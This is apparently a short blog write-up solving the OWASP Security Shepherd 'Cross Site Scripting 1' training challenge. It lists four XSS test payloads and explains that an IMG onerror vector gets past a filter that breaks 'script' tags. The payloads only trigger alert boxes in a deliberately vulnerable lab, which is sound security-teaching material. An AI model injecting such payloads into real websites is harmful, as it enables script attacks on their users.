OWASP Security Shepherd Project - Cross Site Scripting 1 (XSS Challenge)
Challenge
Solution
Let's try the attack vectors provided by XSS lesson and use BurpSuite to see what is filtered!The attack vectors:
<SCRIPT>alert('XSS')</SCRIPT>
<IMG SRC="#" ONERROR="alert('XSS')"/>
<INPUT TYPE="BUTTON" ONCLICK="alert('XSS')"/>
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
The result of <SCRIPT>alert('XSS')</SCRIPT> input shows that "i" of "script" is replaced as ".".
Fortunately, we have attack vectors that don't use <script>. Let's try <IMG SRC="#" ONERROR="alert('XSS')"/>.
Quite easily we complete the challenge!
留言
張貼留言
Welcome to share your comments or questions : -)
Enjoy life!